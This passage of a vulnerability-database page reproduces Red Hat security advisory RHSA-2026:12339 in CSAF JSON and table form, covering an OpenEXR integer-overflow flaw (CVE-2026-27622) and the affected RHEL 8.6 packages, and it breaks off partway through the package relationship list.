"AppStream-9.4.0.Z.EUS:openexr-0:3.1.1-2.el9_4.2.s390x",
"AppStream-9.4.0.Z.EUS:openexr-0:3.1.1-2.el9_4.2.src",
"AppStream-9.4.0.Z.EUS:openexr-0:3.1.1-2.el9_4.2.x86_64",
"AppStream-9.4.0.Z.EUS:openexr-debuginfo-0:3.1.1-2.el9_4.2.aarch64",
"AppStream-9.4.0.Z.EUS:openexr-debuginfo-0:3.1.1-2.el9_4.2.i686",
"AppStream-9.4.0.Z.EUS:openexr-debuginfo-0:3.1.1-2.el9_4.2.ppc64le",
"AppStream-9.4.0.Z.EUS:openexr-debuginfo-0:3.1.1-2.el9_4.2.s390x",
"AppStream-9.4.0.Z.EUS:openexr-debuginfo-0:3.1.1-2.el9_4.2.x86_64",
"AppStream-9.4.0.Z.EUS:openexr-debugsource-0:3.1.1-2.el9_4.2.aarch64",
"AppStream-9.4.0.Z.EUS:openexr-debugsource-0:3.1.1-2.el9_4.2.i686",
"AppStream-9.4.0.Z.EUS:openexr-debugsource-0:3.1.1-2.el9_4.2.ppc64le",
"AppStream-9.4.0.Z.EUS:openexr-debugsource-0:3.1.1-2.el9_4.2.s390x",
"AppStream-9.4.0.Z.EUS:openexr-debugsource-0:3.1.1-2.el9_4.2.x86_64",
"AppStream-9.4.0.Z.EUS:openexr-devel-0:3.1.1-2.el9_4.2.aarch64",
"AppStream-9.4.0.Z.EUS:openexr-devel-0:3.1.1-2.el9_4.2.i686",
"AppStream-9.4.0.Z.EUS:openexr-devel-0:3.1.1-2.el9_4.2.ppc64le",
"AppStream-9.4.0.Z.EUS:openexr-devel-0:3.1.1-2.el9_4.2.s390x",
"AppStream-9.4.0.Z.EUS:openexr-devel-0:3.1.1-2.el9_4.2.x86_64",
"AppStream-9.4.0.Z.EUS:openexr-libs-0:3.1.1-2.el9_4.2.aarch64",
"AppStream-9.4.0.Z.EUS:openexr-libs-0:3.1.1-2.el9_4.2.i686",
"AppStream-9.4.0.Z.EUS:openexr-libs-0:3.1.1-2.el9_4.2.ppc64le",
"AppStream-9.4.0.Z.EUS:openexr-libs-0:3.1.1-2.el9_4.2.s390x",
"AppStream-9.4.0.Z.EUS:openexr-libs-0:3.1.1-2.el9_4.2.x86_64",
"AppStream-9.4.0.Z.EUS:openexr-libs-debuginfo-0:3.1.1-2.el9_4.2.aarch64",
"AppStream-9.4.0.Z.EUS:openexr-libs-debuginfo-0:3.1.1-2.el9_4.2.i686",
"AppStream-9.4.0.Z.EUS:openexr-libs-debuginfo-0:3.1.1-2.el9_4.2.ppc64le",
"AppStream-9.4.0.Z.EUS:openexr-libs-debuginfo-0:3.1.1-2.el9_4.2.s390x",
"AppStream-9.4.0.Z.EUS:openexr-libs-debuginfo-0:3.1.1-2.el9_4.2.x86_64",
"CRB-9.4.0.Z.EUS:openexr-0:3.1.1-2.el9_4.2.aarch64",
"CRB-9.4.0.Z.EUS:openexr-0:3.1.1-2.el9_4.2.ppc64le",
"CRB-9.4.0.Z.EUS:openexr-0:3.1.1-2.el9_4.2.s390x",
"CRB-9.4.0.Z.EUS:openexr-0:3.1.1-2.el9_4.2.src",
"CRB-9.4.0.Z.EUS:openexr-0:3.1.1-2.el9_4.2.x86_64",
"CRB-9.4.0.Z.EUS:openexr-debuginfo-0:3.1.1-2.el9_4.2.aarch64",
"CRB-9.4.0.Z.EUS:openexr-debuginfo-0:3.1.1-2.el9_4.2.i686",
"CRB-9.4.0.Z.EUS:openexr-debuginfo-0:3.1.1-2.el9_4.2.ppc64le",
"CRB-9.4.0.Z.EUS:openexr-debuginfo-0:3.1.1-2.el9_4.2.s390x",
"CRB-9.4.0.Z.EUS:openexr-debuginfo-0:3.1.1-2.el9_4.2.x86_64",
"CRB-9.4.0.Z.EUS:openexr-debugsource-0:3.1.1-2.el9_4.2.aarch64",
"CRB-9.4.0.Z.EUS:openexr-debugsource-0:3.1.1-2.el9_4.2.i686",
"CRB-9.4.0.Z.EUS:openexr-debugsource-0:3.1.1-2.el9_4.2.ppc64le",
"CRB-9.4.0.Z.EUS:openexr-debugsource-0:3.1.1-2.el9_4.2.s390x",
"CRB-9.4.0.Z.EUS:openexr-debugsource-0:3.1.1-2.el9_4.2.x86_64",
"CRB-9.4.0.Z.EUS:openexr-devel-0:3.1.1-2.el9_4.2.aarch64",
"CRB-9.4.0.Z.EUS:openexr-devel-0:3.1.1-2.el9_4.2.i686",
"CRB-9.4.0.Z.EUS:openexr-devel-0:3.1.1-2.el9_4.2.ppc64le",
"CRB-9.4.0.Z.EUS:openexr-devel-0:3.1.1-2.el9_4.2.s390x",
"CRB-9.4.0.Z.EUS:openexr-devel-0:3.1.1-2.el9_4.2.x86_64",
"CRB-9.4.0.Z.EUS:openexr-libs-0:3.1.1-2.el9_4.2.aarch64",
"CRB-9.4.0.Z.EUS:openexr-libs-0:3.1.1-2.el9_4.2.i686",
"CRB-9.4.0.Z.EUS:openexr-libs-0:3.1.1-2.el9_4.2.ppc64le",
"CRB-9.4.0.Z.EUS:openexr-libs-0:3.1.1-2.el9_4.2.s390x",
"CRB-9.4.0.Z.EUS:openexr-libs-0:3.1.1-2.el9_4.2.x86_64",
"CRB-9.4.0.Z.EUS:openexr-libs-debuginfo-0:3.1.1-2.el9_4.2.aarch64",
"CRB-9.4.0.Z.EUS:openexr-libs-debuginfo-0:3.1.1-2.el9_4.2.i686",
"CRB-9.4.0.Z.EUS:openexr-libs-debuginfo-0:3.1.1-2.el9_4.2.ppc64le",
"CRB-9.4.0.Z.EUS:openexr-libs-debuginfo-0:3.1.1-2.el9_4.2.s390x",
"CRB-9.4.0.Z.EUS:openexr-libs-debuginfo-0:3.1.1-2.el9_4.2.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "openexr: OpenEXR: Arbitrary code execution via integer overflow in EXR file processing"
}
]
}
RHSA-2026:12339
Vulnerability from csaf_redhat - Published: 2026-04-30 15:26 - Updated: 2026-05-14 22:36A flaw was found in OpenEXR, an image storage format library for the motion picture industry. An attacker can craft a malicious EXR file that, when processed, causes an integer overflow in the `CompositeDeepScanLine::readPixels` function. This overflow leads to an undersized buffer allocation, which can then be overrun during write operations. Successful exploitation could result in arbitrary code execution or a denial of service (DoS).
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: AppStream-8.6.0.Z.AUS:OpenEXR-0:2.2.0-12.el8_6.1.src | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.6.0.Z.AUS:OpenEXR-debuginfo-0:2.2.0-12.el8_6.1.i686 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.6.0.Z.AUS:OpenEXR-debuginfo-0:2.2.0-12.el8_6.1.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.6.0.Z.AUS:OpenEXR-debugsource-0:2.2.0-12.el8_6.1.i686 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.6.0.Z.AUS:OpenEXR-debugsource-0:2.2.0-12.el8_6.1.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.6.0.Z.AUS:OpenEXR-libs-0:2.2.0-12.el8_6.1.i686 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.6.0.Z.AUS:OpenEXR-libs-0:2.2.0-12.el8_6.1.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.6.0.Z.AUS:OpenEXR-libs-debuginfo-0:2.2.0-12.el8_6.1.i686 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.6.0.Z.AUS:OpenEXR-libs-debuginfo-0:2.2.0-12.el8_6.1.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.6.0.Z.E4S:OpenEXR-0:2.2.0-12.el8_6.1.src | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.6.0.Z.E4S:OpenEXR-debuginfo-0:2.2.0-12.el8_6.1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.6.0.Z.E4S:OpenEXR-debuginfo-0:2.2.0-12.el8_6.1.i686 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.6.0.Z.E4S:OpenEXR-debuginfo-0:2.2.0-12.el8_6.1.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.6.0.Z.E4S:OpenEXR-debuginfo-0:2.2.0-12.el8_6.1.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.6.0.Z.E4S:OpenEXR-debuginfo-0:2.2.0-12.el8_6.1.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.6.0.Z.E4S:OpenEXR-debugsource-0:2.2.0-12.el8_6.1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.6.0.Z.E4S:OpenEXR-debugsource-0:2.2.0-12.el8_6.1.i686 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.6.0.Z.E4S:OpenEXR-debugsource-0:2.2.0-12.el8_6.1.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.6.0.Z.E4S:OpenEXR-debugsource-0:2.2.0-12.el8_6.1.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.6.0.Z.E4S:OpenEXR-debugsource-0:2.2.0-12.el8_6.1.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.6.0.Z.E4S:OpenEXR-libs-0:2.2.0-12.el8_6.1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.6.0.Z.E4S:OpenEXR-libs-0:2.2.0-12.el8_6.1.i686 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.6.0.Z.E4S:OpenEXR-libs-0:2.2.0-12.el8_6.1.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.6.0.Z.E4S:OpenEXR-libs-0:2.2.0-12.el8_6.1.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.6.0.Z.E4S:OpenEXR-libs-0:2.2.0-12.el8_6.1.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.6.0.Z.E4S:OpenEXR-libs-debuginfo-0:2.2.0-12.el8_6.1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.6.0.Z.E4S:OpenEXR-libs-debuginfo-0:2.2.0-12.el8_6.1.i686 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.6.0.Z.E4S:OpenEXR-libs-debuginfo-0:2.2.0-12.el8_6.1.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.6.0.Z.E4S:OpenEXR-libs-debuginfo-0:2.2.0-12.el8_6.1.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.6.0.Z.E4S:OpenEXR-libs-debuginfo-0:2.2.0-12.el8_6.1.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.6.0.Z.TUS:OpenEXR-0:2.2.0-12.el8_6.1.src | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.6.0.Z.TUS:OpenEXR-debuginfo-0:2.2.0-12.el8_6.1.i686 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.6.0.Z.TUS:OpenEXR-debuginfo-0:2.2.0-12.el8_6.1.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.6.0.Z.TUS:OpenEXR-debugsource-0:2.2.0-12.el8_6.1.i686 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.6.0.Z.TUS:OpenEXR-debugsource-0:2.2.0-12.el8_6.1.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.6.0.Z.TUS:OpenEXR-libs-0:2.2.0-12.el8_6.1.i686 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.6.0.Z.TUS:OpenEXR-libs-0:2.2.0-12.el8_6.1.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.6.0.Z.TUS:OpenEXR-libs-debuginfo-0:2.2.0-12.el8_6.1.i686 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.6.0.Z.TUS:OpenEXR-libs-debuginfo-0:2.2.0-12.el8_6.1.x86_64 | — |
Vendor Fix
fix
Workaround
|
{
"document": {
"aggregate_severity": {
"namespace": "https://access.redhat.com/security/updates/classification/",
"text": "Important"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright \u00a9 Red Hat, Inc. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "An update for OpenEXR is now available for Red Hat Enterprise Linux 8.6 Advanced Mission Critical Update Support, Red Hat Enterprise Linux 8.6 Update Services for SAP Solutions, and Red Hat Enterprise Linux 8.6 Telecommunications Update Service.\n\nRed Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.",
"title": "Topic"
},
{
"category": "general",
"text": "OpenEXR is a high dynamic-range (HDR) image file format developed by Industrial Light \u0026 Magic for use in computer imaging applications. This package contains libraries and sample applications for handling the format. \n\nSecurity Fix(es):\n\n* openexr: OpenEXR: Arbitrary code execution via integer overflow in EXR file processing (CVE-2026-27622)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.",
"title": "Details"
},
{
"category": "legal_disclaimer",
"text": "This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.",
"title": "Terms of Use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://access.redhat.com/security/team/contact/",
"issuing_authority": "Red Hat Product Security is responsible for vulnerability handling across all Red Hat products and services.",
"name": "Red Hat Product Security",
"namespace": "https://www.redhat.com"
},
"references": [
{
"category": "self",
"summary": "https://access.redhat.com/errata/RHSA-2026:12339",
"url": "https://access.redhat.com/errata/RHSA-2026:12339"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/updates/classification/#important",
"url": "https://access.redhat.com/security/updates/classification/#important"
},
{
"category": "external",
"summary": "2444251",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2444251"
},
{
"category": "self",
"summary": "Canonical URL",
"url": "https://security.access.redhat.com/data/csaf/v2/advisories/2026/rhsa-2026_12339.json"
}
],
"title": "Red Hat Security Advisory: OpenEXR security update",
"tracking": {
"current_release_date": "2026-05-14T22:36:28+00:00",
"generator": {
"date": "2026-05-14T22:36:28+00:00",
"engine": {
"name": "Red Hat SDEngine",
"version": "4.8.0"
}
},
"id": "RHSA-2026:12339",
"initial_release_date": "2026-04-30T15:26:09+00:00",
"revision_history": [
{
"date": "2026-04-30T15:26:09+00:00",
"number": "1",
"summary": "Initial version"
},
{
"date": "2026-04-30T15:26:09+00:00",
"number": "2",
"summary": "Last updated version"
},
{
"date": "2026-05-14T22:36:28+00:00",
"number": "3",
"summary": "Last generated version"
}
],
"status": "final",
"version": "3"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_name",
"name": "Red Hat Enterprise Linux AppStream AUS (v.8.6)",
"product": {
"name": "Red Hat Enterprise Linux AppStream AUS (v.8.6)",
"product_id": "AppStream-8.6.0.Z.AUS",
"product_identification_helper": {
"cpe": "cpe:/a:redhat:rhel_aus:8.6::appstream"
}
}
},
{
"category": "product_name",
"name": "Red Hat Enterprise Linux AppStream E4S (v.8.6)",
"product": {
"name": "Red Hat Enterprise Linux AppStream E4S (v.8.6)",
"product_id": "AppStream-8.6.0.Z.E4S",
"product_identification_helper": {
"cpe": "cpe:/a:redhat:rhel_e4s:8.6::appstream"
}
}
},
{
"category": "product_name",
"name": "Red Hat Enterprise Linux AppStream TUS (v.8.6)",
"product": {
"name": "Red Hat Enterprise Linux AppStream TUS (v.8.6)",
"product_id": "AppStream-8.6.0.Z.TUS",
"product_identification_helper": {
"cpe": "cpe:/a:redhat:rhel_tus:8.6::appstream"
}
}
}
],
"category": "product_family",
"name": "Red Hat Enterprise Linux"
},
{
"branches": [
{
"category": "product_version",
"name": "OpenEXR-0:2.2.0-12.el8_6.1.src",
"product": {
"name": "OpenEXR-0:2.2.0-12.el8_6.1.src",
"product_id": "OpenEXR-0:2.2.0-12.el8_6.1.src",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/OpenEXR@2.2.0-12.el8_6.1?arch=src"
}
}
}
],
"category": "architecture",
"name": "src"
},
{
"branches": [
{
"category": "product_version",
"name": "OpenEXR-libs-0:2.2.0-12.el8_6.1.i686",
"product": {
"name": "OpenEXR-libs-0:2.2.0-12.el8_6.1.i686",
"product_id": "OpenEXR-libs-0:2.2.0-12.el8_6.1.i686",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/OpenEXR-libs@2.2.0-12.el8_6.1?arch=i686"
}
}
},
{
"category": "product_version",
"name": "OpenEXR-debugsource-0:2.2.0-12.el8_6.1.i686",
"product": {
"name": "OpenEXR-debugsource-0:2.2.0-12.el8_6.1.i686",
"product_id": "OpenEXR-debugsource-0:2.2.0-12.el8_6.1.i686",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/OpenEXR-debugsource@2.2.0-12.el8_6.1?arch=i686"
}
}
},
{
"category": "product_version",
"name": "OpenEXR-debuginfo-0:2.2.0-12.el8_6.1.i686",
"product": {
"name": "OpenEXR-debuginfo-0:2.2.0-12.el8_6.1.i686",
"product_id": "OpenEXR-debuginfo-0:2.2.0-12.el8_6.1.i686",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/OpenEXR-debuginfo@2.2.0-12.el8_6.1?arch=i686"
}
}
},
{
"category": "product_version",
"name": "OpenEXR-libs-debuginfo-0:2.2.0-12.el8_6.1.i686",
"product": {
"name": "OpenEXR-libs-debuginfo-0:2.2.0-12.el8_6.1.i686",
"product_id": "OpenEXR-libs-debuginfo-0:2.2.0-12.el8_6.1.i686",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/OpenEXR-libs-debuginfo@2.2.0-12.el8_6.1?arch=i686"
}
}
}
],
"category": "architecture",
"name": "i686"
},
{
"branches": [
{
"category": "product_version",
"name": "OpenEXR-libs-0:2.2.0-12.el8_6.1.x86_64",
"product": {
"name": "OpenEXR-libs-0:2.2.0-12.el8_6.1.x86_64",
"product_id": "OpenEXR-libs-0:2.2.0-12.el8_6.1.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/OpenEXR-libs@2.2.0-12.el8_6.1?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "OpenEXR-debugsource-0:2.2.0-12.el8_6.1.x86_64",
"product": {
"name": "OpenEXR-debugsource-0:2.2.0-12.el8_6.1.x86_64",
"product_id": "OpenEXR-debugsource-0:2.2.0-12.el8_6.1.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/OpenEXR-debugsource@2.2.0-12.el8_6.1?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "OpenEXR-debuginfo-0:2.2.0-12.el8_6.1.x86_64",
"product": {
"name": "OpenEXR-debuginfo-0:2.2.0-12.el8_6.1.x86_64",
"product_id": "OpenEXR-debuginfo-0:2.2.0-12.el8_6.1.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/OpenEXR-debuginfo@2.2.0-12.el8_6.1?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "OpenEXR-libs-debuginfo-0:2.2.0-12.el8_6.1.x86_64",
"product": {
"name": "OpenEXR-libs-debuginfo-0:2.2.0-12.el8_6.1.x86_64",
"product_id": "OpenEXR-libs-debuginfo-0:2.2.0-12.el8_6.1.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/OpenEXR-libs-debuginfo@2.2.0-12.el8_6.1?arch=x86_64"
}
}
}
],
"category": "architecture",
"name": "x86_64"
},
{
"branches": [
{
"category": "product_version",
"name": "OpenEXR-libs-0:2.2.0-12.el8_6.1.aarch64",
"product": {
"name": "OpenEXR-libs-0:2.2.0-12.el8_6.1.aarch64",
"product_id": "OpenEXR-libs-0:2.2.0-12.el8_6.1.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/OpenEXR-libs@2.2.0-12.el8_6.1?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "OpenEXR-debugsource-0:2.2.0-12.el8_6.1.aarch64",
"product": {
"name": "OpenEXR-debugsource-0:2.2.0-12.el8_6.1.aarch64",
"product_id": "OpenEXR-debugsource-0:2.2.0-12.el8_6.1.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/OpenEXR-debugsource@2.2.0-12.el8_6.1?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "OpenEXR-debuginfo-0:2.2.0-12.el8_6.1.aarch64",
"product": {
"name": "OpenEXR-debuginfo-0:2.2.0-12.el8_6.1.aarch64",
"product_id": "OpenEXR-debuginfo-0:2.2.0-12.el8_6.1.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/OpenEXR-debuginfo@2.2.0-12.el8_6.1?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "OpenEXR-libs-debuginfo-0:2.2.0-12.el8_6.1.aarch64",
"product": {
"name": "OpenEXR-libs-debuginfo-0:2.2.0-12.el8_6.1.aarch64",
"product_id": "OpenEXR-libs-debuginfo-0:2.2.0-12.el8_6.1.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/OpenEXR-libs-debuginfo@2.2.0-12.el8_6.1?arch=aarch64"
}
}
}
],
"category": "architecture",
"name": "aarch64"
},
{
"branches": [
{
"category": "product_version",
"name": "OpenEXR-libs-0:2.2.0-12.el8_6.1.ppc64le",
"product": {
"name": "OpenEXR-libs-0:2.2.0-12.el8_6.1.ppc64le",
"product_id": "OpenEXR-libs-0:2.2.0-12.el8_6.1.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/OpenEXR-libs@2.2.0-12.el8_6.1?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "OpenEXR-debugsource-0:2.2.0-12.el8_6.1.ppc64le",
"product": {
"name": "OpenEXR-debugsource-0:2.2.0-12.el8_6.1.ppc64le",
"product_id": "OpenEXR-debugsource-0:2.2.0-12.el8_6.1.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/OpenEXR-debugsource@2.2.0-12.el8_6.1?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "OpenEXR-debuginfo-0:2.2.0-12.el8_6.1.ppc64le",
"product": {
"name": "OpenEXR-debuginfo-0:2.2.0-12.el8_6.1.ppc64le",
"product_id": "OpenEXR-debuginfo-0:2.2.0-12.el8_6.1.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/OpenEXR-debuginfo@2.2.0-12.el8_6.1?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "OpenEXR-libs-debuginfo-0:2.2.0-12.el8_6.1.ppc64le",
"product": {
"name": "OpenEXR-libs-debuginfo-0:2.2.0-12.el8_6.1.ppc64le",
"product_id": "OpenEXR-libs-debuginfo-0:2.2.0-12.el8_6.1.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/OpenEXR-libs-debuginfo@2.2.0-12.el8_6.1?arch=ppc64le"
}
}
}
],
"category": "architecture",
"name": "ppc64le"
},
{
"branches": [
{
"category": "product_version",
"name": "OpenEXR-libs-0:2.2.0-12.el8_6.1.s390x",
"product": {
"name": "OpenEXR-libs-0:2.2.0-12.el8_6.1.s390x",
"product_id": "OpenEXR-libs-0:2.2.0-12.el8_6.1.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/OpenEXR-libs@2.2.0-12.el8_6.1?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "OpenEXR-debugsource-0:2.2.0-12.el8_6.1.s390x",
"product": {
"name": "OpenEXR-debugsource-0:2.2.0-12.el8_6.1.s390x",
"product_id": "OpenEXR-debugsource-0:2.2.0-12.el8_6.1.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/OpenEXR-debugsource@2.2.0-12.el8_6.1?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "OpenEXR-debuginfo-0:2.2.0-12.el8_6.1.s390x",
"product": {
"name": "OpenEXR-debuginfo-0:2.2.0-12.el8_6.1.s390x",
"product_id": "OpenEXR-debuginfo-0:2.2.0-12.el8_6.1.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/OpenEXR-debuginfo@2.2.0-12.el8_6.1?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "OpenEXR-libs-debuginfo-0:2.2.0-12.el8_6.1.s390x",
"product": {
"name": "OpenEXR-libs-debuginfo-0:2.2.0-12.el8_6.1.s390x",
"product_id": "OpenEXR-libs-debuginfo-0:2.2.0-12.el8_6.1.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/OpenEXR-libs-debuginfo@2.2.0-12.el8_6.1?arch=s390x"
}
}
}
],
"category": "architecture",
"name": "s390x"
}
],
"category": "vendor",
"name": "Red Hat"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "OpenEXR-0:2.2.0-12.el8_6.1.src as a component of Red Hat Enterprise Linux AppStream AUS (v.8.6)",
"product_id": "AppStream-8.6.0.Z.AUS:OpenEXR-0:2.2.0-12.el8_6.1.src"
},
"product_reference": "OpenEXR-0:2.2.0-12.el8_6.1.src",
"relates_to_product_reference": "AppStream-8.6.0.Z.AUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "OpenEXR-debuginfo-0:2.2.0-12.el8_6.1.i686 as a component of Red Hat Enterprise Linux AppStream AUS (v.8.6)",
"product_id": "AppStream-8.6.0.Z.AUS:OpenEXR-debuginfo-0:2.2.0-12.el8_6.1.i686"
},
"product_reference": "OpenEXR-debuginfo-0:2.2.0-12.el8_6.1.i686",
"relates_to_product_reference": "AppStream-8.6.0.Z.AUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "OpenEXR-debuginfo-0:2.2.0-12.el8_6.1.x86_64 as a component of Red Hat Enterprise Linux AppStream AUS (v.8.6)",
"product_id": "AppStream-8.6.0.Z.AUS:OpenEXR-debuginfo-0:2.2.0-12.el8_6.1.x86_64"
},
"product_reference": "OpenEXR-debuginfo-0:2.2.0-12.el8_6.1.x86_64",
"relates_to_product_reference": "AppStream-8.6.0.Z.AUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "OpenEXR-debugsource-0:2.2.0-12.el8_6.1.i686 as a component of Red Hat Enterprise Linux AppStream AUS (v.8.6)",
"product_id": "AppStream-8.6.0.Z.AUS:OpenEXR-debugsource-0:2.2.0-12.el8_6.1.i686"
},
"product_reference": "OpenEXR-debugsource-0:2.2.0-12.el8_6.1.i686",
"relates_to_product_reference": "AppStream-8.6.0.Z.AUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "OpenEXR-debugsource-0:2.2.0-12.el8_6.1.x86_64 as a component of Red Hat Enterprise Linux AppStream AUS (v.8.6)",
"product_id": "AppStream-8.6.0.Z.AUS:OpenEXR-debugsource-0:2.2.0-12.el8_6.1.x86_64"
},
"product_reference": "OpenEXR-debugsource-0:2.2.0-12.el8_6.1.x86_64",
"relates_to_product_reference": "AppStream-8.6.0.Z.AUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "OpenEXR-libs-0:2.2.0-12.el8_6.1.i686 as a component of Red Hat Enterprise Linux AppStream AUS (v.8.6)",
"product_id": "AppStream-8.6.0.Z.AUS:OpenEXR-libs-0:2.2.0-12.el8_6.1.i686"
},
"product_reference": "OpenEXR-libs-0:2.2.0-12.el8_6.1.i686",
"relates_to_product_reference": "AppStream-8.6.0.Z.AUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "OpenEXR-libs-0:2.2.0-12.el8_6.1.x86_64 as a component of Red Hat Enterprise Linux AppStream AUS (v.8.6)",
"product_id": "AppStream-8.6.0.Z.AUS:OpenEXR-libs-0:2.2.0-12.el8_6.1.x86_64"
},
"product_reference": "OpenEXR-libs-0:2.2.0-12.el8_6.1.x86_64",
"relates_to_product_reference": "AppStream-8.6.0.Z.AUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "OpenEXR-libs-debuginfo-0:2.2.0-12.el8_6.1.i686 as a component of Red Hat Enterprise Linux AppStream AUS (v.8.6)",
"product_id": "AppStream-8.6.0.Z.AUS:OpenEXR-libs-debuginfo-0:2.2.0-12.el8_6.1.i686"
},
"product_reference": "OpenEXR-libs-debuginfo-0:2.2.0-12.el8_6.1.i686",
"relates_to_product_reference": "AppStream-8.6.0.Z.AUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "OpenEXR-libs-debuginfo-0:2.2.0-12.el8_6.1.x86_64 as a component of Red Hat Enterprise Linux AppStream AUS (v.8.6)",
"product_id": "AppStream-8.6.0.Z.AUS:OpenEXR-libs-debuginfo-0:2.2.0-12.el8_6.1.x86_64"
},
"product_reference": "OpenEXR-libs-debuginfo-0:2.2.0-12.el8_6.1.x86_64",
"relates_to_product_reference": "AppStream-8.6.0.Z.AUS"
},
{
"category": "default_component_of",
